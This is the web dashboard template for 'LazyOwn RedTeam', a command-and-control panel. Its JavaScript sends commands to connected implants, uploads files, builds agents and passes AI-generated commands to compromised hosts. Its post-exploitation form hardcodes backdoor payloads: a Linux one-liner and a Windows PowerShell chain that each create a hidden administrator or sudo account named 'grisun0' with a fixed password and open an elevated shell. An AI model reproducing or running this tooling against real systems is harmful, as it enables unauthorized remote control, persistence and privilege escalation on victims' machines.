{% extends "base.html" %}

{% block content %}


        <div class="card bg-secondary text-light p-4 mb-4">
            <p>
                Disclaimer: [!] Please do not use this in military or secret service organizations, or for illegal purposes. (This is non-binding, as these entities often disregard laws and ethics anyway.)
            </p>
            <h2>Connected Clients</h2>
            <ul class="list-group">
                {% for client_id in connected_clients %}
                    <li class="list-group-item list-group-item-success">{{ client_id }}</li>
                {% endfor %}
            </ul>
            <div id="mynetwork"></div>
            {% include 'nav.html' %}
            {% include 'bots.html' %}
            <h2 class="mt-4">Contact</h2>
            <p>For any questions or feedback, please reach out to <a href="mailto\:grisiscomeback[at]gmail[dot]com" class="text-success">Gris Iscomeback</a>.</p>
            <br><br><br><br>
        </div>
        <br><br><br><br>
        <div id="dock-container">
            <div id="dock">
                <ul id="uldocker" >
                    <li id="generalButton">
                        <span>Gen Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>                     
                    <li id="taskButton">
                        <span>Task Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>                      
                    <li id="redopButton">
                        <span>ROP Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>                    
                    <li id="vulnButton">
                        <span>Vuln Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>
                    <li id="searchButton">
                        <span>I+D Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>
                    <li id="scriptButton">
                        <span>Dev Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>
                    <li id="chatbotButton" >
                        <span>Cmd Bot</span>
                        <a href="#"><img src="/static/Mac-icon.png"/></a>
                    </li>
                </ul>
                
                <p class="neon-text">&copy; 2025 LazyOwn RedTeam. All rights GPLv3.</p>
                
            </div>
        </div>
        <div id="toastr" onclick="clearToastr();" class="toastr alert alert-success" role="alert">
        </div>
        <!-- Google tag (gtag.js) -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=G-T4VF6JJ095"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag('js', new Date());

            gtag('config', 'G-T4VF6JJ095');
        </script>
        <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
        <script src='https://storage.ko-fi.com/cdn/scripts/overlay-widget.js'></script>
        <script src="https://unpkg.com/vis-network/standalone/umd/vis-network.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-beta.1/dist/js/select2.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/showdown/2.1.0/showdown.min.js"></script>
        <script src="https://unpkg.com/tippy.js@6"></script>
        <script src="https://cdn.jsdelivr.net/npm/quill@2.0.3/dist/quill.js"></script>
        <script src="/static/js/xterm.js"></script>

        <script>
            


            cleanOutputText = "";
            bot = '{{ bot | markdown |  replace("\'", "\\\'") | safe }}';
            event_config = {{ event_config  | tojson | safe  }};
            elo = '{{ elo }}';
            username = '{{ current_user.username }}'; 
            user_id = '{{ current_user_id }}';
            karma = '{{ karma_name }}';
            prompt_cmd = '{{ prompt | safe }}';
            const eventStates = {};
            var menu = $('.menu');
            var barra_busqueda = $('.search_bar');
            var bar = $('#bar');
            var icono = $('.icon-search');
            
            barra_busqueda.focusin(function(){
                barra_busqueda.css('width', '20%');
                menu.css('width', '100%');
                icono.css('color', '#000');
                bar.css('color', '#000');
            });

            barra_busqueda.focusout(function(){
                barra_busqueda.css('width', '15%');
                menu.css('width', '99%');
                icono.css('color', '#fff');
                bar.css('color', '#fff');
            });
            event_config.events.forEach(event => {
                eventStates[`not_${event.name}`] = true;
            });
            events_json = {};
            async function sendNotification(htmlContent) {
                const url = '/push_notification';
                const formData = new FormData();
                formData.append('html', htmlContent);

                try {
                    const response = await fetch(url, {
                        method: 'POST',
                        body: formData
                    });

                    if (!response.ok) {
                        throw new Error('Network response was not ok ' + response.statusText);
                    }

                    const data = await response.json();
                    console.log('Success:', data);
                } catch (error) {
                    console.error('Error:', error);
                }
            }            
            function vulnForm(event){
           
                var userInput = '';
                const spinner = document.getElementById('loader');
                spinner.style.display = 'block'; 

                fetch('/vuln', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ prompt: userInput, event_view:event})
                })
                .then(response => response.json())
                .then(data => {
         
                    spinner.style.display = 'none';
                    if (data.error) {
                        
                        document.getElementById('vulnResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                    } else {
                        
                        var converter = new showdown.Converter();
                        var html = converter.makeHtml(data.response);
                        document.getElementById('vulnResponse').innerHTML += `<p>${html}</p>`;
                        if (data.response) {
                            console.log(data.response)
                            
                        }
                    }
                })
                .catch(error => {
                    spinner.style.display = 'none';
                    console.error('Error:', error);
                    document.getElementById('vulnResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                });
            }
            function closePopup(self) {
                var popupContainer = self;
                popupContainer.classList.remove('visible');
            }
            function clearToastr() {
                    var toastr = document.getElementById('toastr');
                    var neonTextElements = toastr.children;
                    
                    while (neonTextElements.length > 0) {
                        neonTextElements[0].parentNode.removeChild(neonTextElements[0]);
                    }
                    toastr.classList.remove('show');
            }
            async function fetchEvents() {
                try {
                    const response = await fetch('/events');

                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    const events = await response.json();
                    let events_json = {};
                    for (const event of event_config.events) {
                        const eventName = event.name;
                        const eventKey = eventName.charAt(0).toUpperCase() + eventName.slice(1);
                        if (events[eventName] && events[eventName].exist && eventStates[`not_${eventName}`]) {
                            eventStates[`not_${eventName}`] = false;
                            console.log(`${eventKey} events found:`, events[eventName]);
                            toastr(`<h1>${eventKey}</h1> <h2> events found !!!</h2>`);
                            aumentarElo(user_id, 50, eventKey);
                            document.getElementById('vulnButton').click();
                            events_json[eventName] = true;
                            vulnForm(eventName);
                        }
                    }
                    if (Object.keys(events_json).length === 0) {
                        console.log("No events found.");
                    }
                } catch (error) {
                    console.error('Error fetching events:', error);
                }
            }
            function toastr(command) {
                    var toastr = document.getElementById('toastr');
                    toastr.classList.add('show');
                    toastr.innerHTML += "<div onclick='closePopup(this);' class='neon-text'> " + command + " </div><br><hr>";
                    sendNotification(command)
                    setTimeout(function() {
                        clearToastr();
                    }, 22000);
            }
            function formGeneral_bot(prompt = ""){
                const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    var userInput = "";
                    if (prompt){
                        userInput = prompt;
                    } else {
                        userInput = document.getElementById('generalInput').value;
                    }
                    fetch('/generalbot', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log(data['response']); 
                        spinner.style.display = 'none';
                        if (data.error) {
                            document.getElementById('generalResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data.response);
                            document.getElementById('generalResponse').innerHTML += `<p>${html}</p>`;
                            document.getElementById('outputIA').innerHTML += `<p>${html}</p>`;
                            

                            if (data.response) {
                                console.log(data.response)
                                //document.getElementById('generalResponse').innerHTML += `<pre>${data.output}</pre>`;
                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.error('Error:', error);
                        document.getElementById('generalResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
            }
            toastr(bot)  
            fetchEvents();
            async function fetchCSVData(filePath, id_client) {
                const spinner = document.getElementById('loader');
                spinner.style.display = 'block';
                const response = await fetch('/csv_to_html', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ file_path: filePath })
                });

                if (response.ok) {
                    spinner.style.display = 'none';
                    const html = await response.text();
                    var selector = 'outputLog' + id_client;
                    document.getElementById(selector).innerHTML = html;
                    var popupContainer = document.getElementById('popupContainer' + id_client);
                    popupContainer.classList.add('visible');
                    setTimeout(closePopup, 10000);

                } else {
                    spinner.style.display = 'none';
                    const error = await response.json();
                    console.error('Error:', error);
                }
                spinner.style.display = 'none';
            }
            async function aumentarElo(userId, cantidad, eventy) {
                try {
                    const response = await fetch(`/aumentar_elo/${userId}`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ cantidad: cantidad }),  // Enviar la cantidad en el cuerpo
                    });

                    if (!response.ok) {
                        throw new Error(`Error: ${response.statusText}`);
                    }
                    const data = await response.json();
                    toastr(`<h1>New ${eventy} achievement unlocked. </h1><h2> ${data.message} </h2>`);
                } catch (error) {
                    console.error('Error al aumentar el Elo:', error);
                }
            }            
            document.addEventListener('DOMContentLoaded', function() {
                setInterval(fetchEvents, 60000);
                $("#dock-container").on('mouseleave', function() {
                    $(this).css('bottom', '-100px');
                });

                $("#dock-container").on('mouseenter', function() {
                    $(this).css('bottom', '0px');
                });
                const quill = new Quill("#description", {
                    theme: "snow",
                });

                document.getElementById('taskForm').addEventListener('submit', function(event) {
                    event.preventDefault(); 

                    
                    const title = document.getElementById('title').value;
                    const description = quill.root.innerHTML; 
                    const operator = document.getElementById('operator').value;
                    const status = document.getElementById('status').value;
                    
                    const formData = new FormData();
                    formData.append('title', title);
                    formData.append('description', description);
                    formData.append('operator', operator);
                    formData.append('status', status);
  
                    fetch('/', {
                        method: 'POST',
                        body: formData
                    })
                    .then(response => {
                        if (response.redirected) {
                            window.location.href = response.url;
                        } else {
                            return response.json();
                        }
                    })
                    .then(data => {
                        console.log('Success:', data);
                        
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                        
                    });
                });

                const tooltipContainer = document.querySelector('.tooltip-container');
                const tooltipText = document.querySelector('.tooltip-text');

                if (tooltipContainer && tooltipText) {
                    tooltipContainer.addEventListener('mouseover', function() {
                        tooltipText.style.visibility = 'visible';
                        tooltipText.style.opacity = '1';
                    });

                    tooltipContainer.addEventListener('mouseout', function() {
                        tooltipText.style.visibility = 'hidden';
                        tooltipText.style.opacity = '0';
                    });
                } else {
                    console.warn('Tooltip container or text not found.');
                }
                $(document).ready(function() {
                    $('#directory').select2({
                        placeholder: 'Select a tactic',
                        allowClear: true,
                        dropdownCssClass: 'custom-dropdown',
                        theme: 'default'
                    });
                });
                
                kofiWidgetOverlay.draw('grisuno', {
                    'type': 'floating-chat',
                    'floating-chat.donateButton.text': 'Support me',
                    'floating-chat.donateButton.background-color': '#5cb85c',
                    'floating-chat.donateButton.text-color': '#fff'
                });
                function stripAnsi(str) {
                    const ansiRegex = /[\u001b\u009b][[()#;?]*(?:[0-9]{1,4}(?:;[0-9]{0,4})*)?[0-9A-ORZcf-nqry=><]/g;
                    return str.replace(ansiRegex, '');
                }
                function leftTrim(str) {
                    return str.replace(/^\s+/, '').trim();
                }
                async function fetchLog(isChecked) {
                    try {
                        const response = await fetch('/api/output');

                        if (!response.ok) {
                            throw new Error('Network response was not ok ' + response.statusText);
                        }

                        const data = await response.json();
                        const outputDiv = document.getElementById('output');
                        const outputAtomic = document.getElementById('outputAtomic');
                        const outputText = data.output.replace(/\n/g, '<br>');
                        var output = data.output.replace(/\t/g, '    ').replace(/\n/g, '\r\n');
                        var term = new Terminal();
                        term.open(document.getElementById('terminal'));
                        term.write('\x1b[2J\x1b[3J\x1b[H');
                        prompt_cmd = prompt_cmd.replace(/<br>/g, '\n')
                        let lines = prompt_cmd.split('\n');
                        lines.forEach(function(line) {
                            term.write(line);
                        });
                        term.write(output);
                        cleanOutputText = stripAnsi(outputText);
                        if (isChecked){
                            formGeneral_bot(cleanOutputText);
                        }
                        //outputDiv.innerHTML += `<p>${cleanOutputText}</p>`;
                        outputAtomic.innerHTML += `<p>${cleanOutputText}</p>`;
                    } catch (error) {
                        console.error('There was a problem with the fetch operation:', error);
                    }
                }



                async function fetchTasks() {
                    try {
                        const response = await fetch('/gettasks');
                        const tasks = await response.json();
                        tasks.forEach((task, index) => {
                            setTimeout(() => {
                                if (task.status !== "Done") {
                                    toastr(`<h1>Task: ${task.title},</h1> Description: ${task.description}`);
                                }
                            }, index * 1000); 
                        });
                    } catch (error) {
                        console.error('Error fetching tasks:', error);
                    }
                }

                function RunCmd(command){
                    const spinner = document.getElementById('loader');
                    var check = document.getElementById('check_local_shell');
                    var isChecked = false;
                    if (check) {
                        isChecked = check.checked
                        if (isChecked) {
                            console.log('Local Shell Bot enabled');
                        } else {
                            console.log('Local Shell Bot disabled');
                        }
                    } else {
                        console.log('does\'nt exist');
                    }
                    spinner.style.display = 'block';
                    fetch('/api/run', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ command })
                    })
                    .then(response => response.json())
                    .then(data => {
                        const outputDiv = document.getElementById('output');
                        spinner.style.display = 'none';
                        if (data.error) {
                            outputDiv.innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            toastr('<h1>Command:' + command + "</h1>")
                            fetchLog(isChecked)
                        }
                    });
                }

                function RunRemoteCmd(client_id, command){
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';                    
                    const clientId = client_id;
                    const formData = new FormData();
                    formData.append('client_id', clientId);
                    formData.append('command', command);
                    const username = '{{ username }}';
                    const password = '{{ password }}';
                    const credentials = btoa(`${username}:${password}`);
                    fetch('/issue_command', {
                        method: 'POST',
                        body: formData,
                        headers: {
                            'Authorization': `Basic ${credentials}`
                        }
                    })
                    .then(data => {
                        spinner.style.display = 'none';
                        if (data.error) {
                            console.log(`Error: ${data.error}`);
                        } else {
                            var msg = "<h1>Command:" + command + " <h1>";
                            toastr(msg)
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.log(`Error: ${error}`);
                    });
                }
                document.getElementById('post-exploit-form').addEventListener('submit', function(event) {
                    event.preventDefault();
                    const clientId = document.getElementById('client_id').value;
                    os = document.getElementById(clientId).value;
                    if(os === "Linux"){
                        command = "useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && sudo usermod -aG sudo grisun0 && su - grisun0"
                    }
                    if(os === "Windows"){
                        command = "powershell $userExists = Get-LocalUser -Name 'grisun0' -ErrorAction SilentlyContinue; if ($userExists) { Write-Output 'User grisun0 already exists.' } else { $password = 'Grisgrisgris123!'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; New-LocalUser -Name 'grisun0' -Password $securePassword -FullName 'Grisun0 User' -Description 'Grisun0 User'; }; $group = Get-LocalGroup -Name 'Administrators' -ErrorAction SilentlyContinue; if ($group) { Add-LocalGroupMember -Group 'Administrators' -Member 'grisun0' } else { Write-Output 'Group Administrators was not found.' }; Start-Process powershell -Verb runAs -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command `\"Start-Process cmd.exe -Verb runAs -ArgumentList \"/C runas /user:grisun0 cmd.exe\"`\"' ; net localgroup administrators grisun0 /add"
                    }
                    RunRemoteCmd(clientId,command);
                });
                document.getElementById('upload-file-form').addEventListener('submit', function(event) {
                    event.preventDefault();
                    const clientId = document.getElementById('client_id').value;
                    const filePath = document.getElementById('file_path').value;
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';    
                    const formData = new FormData();
                    formData.append('client_id', clientId);
                    formData.append('command', `upload:${filePath}`);

                    
                    const username = '{{ username }}';
                    const password = '{{ password }}';
                    const credentials = btoa(`${username}:${password}`);

                    fetch('/issue_command', {
                        method: 'POST',
                        body: formData,
                        headers: {
                            'Authorization': `Basic ${credentials}`
                        }
                    })
                    .then(data => {
                        spinner.style.display = 'none'; 
                        if (data.error) {
                            console.log(`Error: ${data.error}`);
                        } else {
                            command = "<h1>Upload File Successfully.</h1>"
                            toastr(command)
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none'; 
                        console.log(`Error: ${error}`);
                    });
                });
                document.getElementById('commandForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    command = document.getElementById('attack').value;
                    RunCmd(command)
                });
                async function issueCommand(clientId, command) {
                    const url = '/issue_command';
                    const data = new URLSearchParams();
                    data.append('client_id', clientId);
                    data.append('command', command);
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    try {
                        const response = await fetch(url, {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/x-www-form-urlencoded'
                            },
                            body: data
                        });

                        if (!response.ok) {
                            throw new Error(`Error en la solicitud: ${response.statusText}`);
                        }

                        const result = await response.json();
                        console.log('Response:', result);
                        spinner.style.display = 'none';
                        return result;
                    } catch (error) {
                        spinner.style.display = 'none';
                        console.error('Error command:', error);
                        return { error: error.message };
                    }
                }
                function htmlTitle(html) {
                    const container = document.createElement("div");
                    container.innerHTML = html;
                    return container;
                }
                function generateGraph(connectedClients) {
                    
                    var nodes = new vis.DataSet([
                        {
                            id: 'c2', 
                            label: 'C&C LazyOwn ', 
                            title: htmlTitle(bot),
                            shape: 'image', 
                            image: '/static/c2.png', 
                            size: 100, 
                            font: { color: '#ffffff' }
                        }
                    ]);

                    var edges = new vis.DataSet();

                    var connectedClients = {{ connected_clients | tojson | safe }};
                    var results = {{ commands_history | tojson | safe }};
                    
                    fetch('/aicmd?arg=1')
                        .then(response => response.json())
                        .then(data => {
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data);
                            var newTitle = html;
                            var newLabel = "C&C LazyOwn[AI]TeamServer >_ ";
                            toastr(html)
                            nodes.update({ id: 'c2', label: newLabel, title: htmlTitle(newTitle) });
                        })
                        .catch(error => console.error('Error fetching data:', error));

                    connectedClients.forEach(function(client) {
                        var label = "Implant ID: " +client;
                        var image = '/static/client.png';
                        var selector = '#' + client;
                        var client_os = $(selector).val(); 
                        var ips = $(selector).data('ips');
                        var pid = $(selector).data('pid');
                        var user = $(selector).data('user');
                        var hostname = $(selector).data('hostname');                        
                        if (client_os) {
                            label += " (OS/" + client_os + ")";
                            if (client_os.toLowerCase() === 'linux') {
                                image = '/static/Linux.png';
                            } else if (client_os.toLowerCase() === 'windows') {
                                image = '/static/Windows.png';
                            }
                        }
                        if (ips) {
                            label += "\n (IP/" + ips + ")";
                        }

                        if (pid) {
                            label += "\n (PID/" + pid + ")";
                        }

                        if (user) {
                            label += "\n (User/" + user + ")";
                        }

                        if (hostname) {
                            label += "\n (Hostname/" + hostname + ")";
                        }
                        nodes.add({id: client, title: label, label: label, shape: 'image', image: image, size: 70, font: { color: '#ffffff' }});
                        edges.add({from: 'c2', to: client});
                    });

                    var container = document.getElementById('mynetwork');
                    var data = {
                        nodes: nodes,
                        edges: edges
                    };
                    var options = {
                        nodes: {
                            shape: 'image',
                            size: 70,
                            color: '#5cb85c',
                            borderWidth: 2,
                            borderWidthSelected: 4,
                            shadow: true,
                            font: {
                                size: 16,
                                face: 'Arial',
                                color: '#f8f9fa'
                            }
                        },
                        edges: {
                            width: 2,
                            color: '#5cb85c',
                            arrows: {
                                to: {enabled: true, scaleFactor: 1},
                                from: {enabled: false},
                                middle: {enabled: false}
                            },
                            dashes: false,
                            smooth: true
                        },
                        physics: {
                            forceAtlas2Based: {
                                gravitationalConstant: -50,
                                centralGravity: 0.01,
                                springLength: 400,
                                springConstant: 0.18,
                                damping: 0.4
                            },
                            maxVelocity: 146,
                            solver: 'repulsion',
                            timestep: 0.22,
                            stabilization: {iterations: 150}
                        }
                    };
                    var network = new vis.Network(container, data, options);
                    network.on("selectNode", function(params) {
                        if (params.nodes.length > 0) {
                            var selectedNodeId = params.nodes[0];
                            console.log("Node selected: " + selectedNodeId);
                            var selectElements = document.querySelectorAll('select');
                            selectElements.forEach(function(selectElement) {
                                Array.from(selectElement.options).forEach(function(option) {

                                    if (option.value === selectedNodeId) {

                                        selectElement.value = selectedNodeId;
                                    }
                                });
                            });
                        }
                    });

                }
                function updateStatus() {
                    
                    var statusElements = document.querySelectorAll('.status');

                    statusElements.forEach(function(element) {
                        var clientId = element.id;
                        if (connectedClients.includes(clientId)) {
                            
                            element.innerHTML = '<span class="status-dot" style="background-color: green;"></span> Online';
                            element.classList.add('online');
                            element.classList.remove('offline');
                        } else {
                            
                            element.innerHTML = '<span class="status-dot" style="background-color: red;"></span> Offline';
                            element.classList.add('offline');
                            element.classList.remove('online');
                        }
                    });
                }
                var connectedClients = {{ connected_clients | tojson | safe }};
             



                
                updateStatus();
                generateGraph(connectedClients);

                document.querySelectorAll('.nav-link').forEach(link => {
                    link.addEventListener('click', function(event) {
                        event.preventDefault();
                        document.querySelectorAll('.nav-link').forEach(l => l.classList.remove('active'));
                        link.classList.add('active');
                        document.querySelectorAll('.section').forEach(section => section.classList.remove('active'));
                        document.getElementById(link.getAttribute('data-target')).classList.add('active');
                    });
                });

                window.addEventListener('scroll', function() {
                    var nav = document.getElementById('stickyNav');
                    var scrollPosition = window.scrollY;
                    var navOffsetTop = nav.offsetTop;

                    if (scrollPosition >= 822) {
                        
                        nav.classList.add('sticky');
                    } else {
                        
                        nav.classList.remove('sticky');
                    }
                });
                document.querySelector('.loading-container').style.display = 'none';
                var currentUrl = window.location.href;
                var iframe = document.getElementById('lazywebserver');
                var newUrl = currentUrl.replace(":4444/", "/index2.html");
                function checkUrlExists(url, callback) {
                    var http = new XMLHttpRequest();
                    http.open('HEAD', url, true);
                    http.onreadystatechange = function() {
                        if (http.readyState == 4) {
                            if (http.status >= 200 && http.status < 400) {
                                callback(true);
                            } else {
                                callback(false);
                            }
                        }
                    };
                    http.onerror = function() {
                        callback(false);
                    };
                    http.send();
                }
                checkUrlExists(newUrl, function(exists) {
                    if (exists) {
                        iframe.src = newUrl;
                    } else {
                        iframe.src = currentUrl.replace(":4444/", "/");
                    }
                }); 
                document.getElementById('LazyOsForm').addEventListener('submit', function(event) {
                    event.preventDefault();

                    var ip = document.getElementById('ipl').value;
                    var port = document.getElementById('portl').value;
                    var command = document.getElementById('commandl').value;
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    fetch('/lazyos/' + ip + '/' + port, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ command: command })
                    })
                    .then(response => response.json())
                    .then(data => {
                        spinner.style.display = 'none';
                        document.getElementById('response').innerHTML = '<div class="alert alert-success" role="alert">' + data.response + '</div>';
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        document.getElementById('response').innerHTML = '<div class="alert alert-danger" role="alert">' + error.message + '</div>';
                    });
                });     

                document.getElementById('chatbotButton').addEventListener('click', function() {
                    $('#chatbotModal').modal('show');
                });
                document.getElementById('sistemaOperativo').addEventListener('change', function(event) {    
                    var sistemaOperativo = document.getElementById('sistemaOperativo').value;
                    var user_agent_lin = '{{ lin_useragent }}';
                    var user_agent_win = '{{ win_useragent }}';
                    var userAgent = document.getElementById('userAgent');
                    if (sistemaOperativo == '1'){
                        userAgent.value = user_agent_win;
                    } else if(sistemaOperativo == '2') {
                        userAgent.value = user_agent_lin;
                    } else if(sistemaOperativo == '3') {
                        userAgent.value = user_agent_win;
                    } else {
                        userAgent.value = user_agent_lin;
                    }
                });
                document.getElementById('AgentForm').addEventListener('submit', function(event) {    
                    event.preventDefault();
                    var sistemaOperativo = document.getElementById('sistemaOperativo').value;
                    var userAgent = document.getElementById('userAgent').value;
                    var urlMaleable = document.getElementById('urlMaleable').value;
                    var nombreAgente = document.getElementById('nombreAgente').value;
                    var command = 'c2 ' + nombreAgente + ' ' + sistemaOperativo
                    RunCmd(command)
                    command = 'create_session_json'
                    RunCmd(command)
                });
                document.getElementById('chatbotForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    var userInput = document.getElementById('chatbotInput').value;
                    var connectedClients = {{ connected_clients | tojson | safe }};
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block'; 
                    
                    fetch('/chatbot', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log(data['response']); 
                        spinner.style.display = 'none'; 
                        if (data.error) {
                            
                            document.getElementById('chatbotResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            
                            document.getElementById('chatbotResponse').innerHTML += `<p>${data.response}</p>`;
                            if (data.response) {
                                const userWantsToRun = confirm('Do you want to run the command? \n' + data['response']);
                                if (userWantsToRun) {
                                    var connectedClients = {{ connected_clients | tojson | safe }};
                                
                                    let clientChoice;
                                    if (connectedClients.length === 1) {
                                        
                                        clientChoice = connectedClients[0];
                                    } else if (connectedClients.length > 1) {
                                        alert(connectedClients);                                        
                                        clientChoice = prompt('Choice client:');
                                    } else {
                                        alert('No connected clients available.');
                                        return;
                                    }
                                    if (clientChoice) {
                                        issueCommand(clientChoice, data['response']);
                                    }
                                }
                                document.getElementById('chatbotResponse').innerHTML += `<pre>${data.output}</pre>`;
                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none'; 
                        console.error('Error:', error);
                        document.getElementById('chatbotResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
                    
                    document.getElementById('chatbotInput').value = '';
                });

                document.getElementById('scriptButton').addEventListener('click', function() {
                    $('#scriptModal').modal('show');
                });
                document.getElementById('scriptForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    var userInput = document.getElementById('scriptInput').value;
                    var connectedClients = {{ connected_clients | tojson | safe }};
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block'; 
                    
                    fetch('/script', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        spinner.style.display = 'none';
                        if (data.error) {
                            
                            document.getElementById('scriptResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data.response);
                            document.getElementById('scriptResponse').innerHTML += `<p>${html}</p>`;
                            if (data.response) {
                               
                                //document.getElementById('scriptResponse').innerHTML += `<pre>${data.output}</pre>`;
                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.error('Error:', error);
                        document.getElementById('scriptResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
                    
                    document.getElementById('scriptInput').value = '';
                });


                document.getElementById('vulnButton').addEventListener('click', function() {
                    $('#vulnModal').modal('show');
                });
                
                document.getElementById('vulnForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    
                    vulnForm();
                    
                    
                });
                document.getElementById('searchButton').addEventListener('click', function() {
                    $('#searchModal').modal('show');
                });
                
                document.getElementById('searchForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    var userInput = document.getElementById('searchInput').value;
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block'; 
                    fetch('/search', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        spinner.style.display = 'none';
                        console.log(data['response']); 
                        if (data.error) {
                            
                            document.getElementById('searchResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data.response);
                            document.getElementById('searchResponse').innerHTML += `<p>${html}</p>`;
                            if (data.response) {
                                console.log(data.response)
                               
                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.error('Error:', error);
                        document.getElementById('searchResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
                    
                    
                });    
                document.getElementById('redopButton').addEventListener('click', function() {
                    $('#redopModal').modal('show');
                });
                
                document.getElementById('redopForm').addEventListener('submit', function(event) {
                    event.preventDefault();
                    var userInput = '';
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    fetch('/redop', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log(data['response']); 
                        spinner.style.display = 'none';
                        if (data.error) {
                            
                            document.getElementById('redopResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data.response);
                            document.getElementById('redopResponse').innerHTML += `<p>${html}</p>`;
                            if (data.response) {
                                console.log(data.response)
                                //document.getElementById('redopResponse').innerHTML += `<pre>${data.output}</pre>`;
                            }
                        }
                    })
                    .catch(error => {
                        spinner.style.display = 'none';
                        console.error('Error:', error);
                        document.getElementById('redopResponse').innerHTML += `<p style="color: red;">Error de red: ${error.message}</p>`;
                    });
                    
                    
                });       

                document.getElementById('taskButton').addEventListener('click', function() {
                    $('#taskModal').modal('show');
                });
                document.getElementById('taskFormbot').addEventListener('submit', function(event) {
                    event.preventDefault();
                    const spinner = document.getElementById('loader');
                    spinner.style.display = 'block';
                    var userInput = '';

                    fetch('/taskbot', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ prompt: userInput })
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log(data['response']); 
                        spinner.style.display = 'none';
                        if (data.error) {
                            document.getElementById('taskResponse').innerHTML += `<p style="color: red;">${data.error}</p>`;
                        } else {
                            var converter = new showdown.Converter();
                            var html = converter.makeHtml(data.response);
                            document.getElementById('taskResponse').innerHTML += `<p>${html}</p>`;
                            if (data.response) {
                                console.log(data.response)
                                //document.getElementById('taskResponse').innerHTML += `<pre>${data.output}</pre>`;
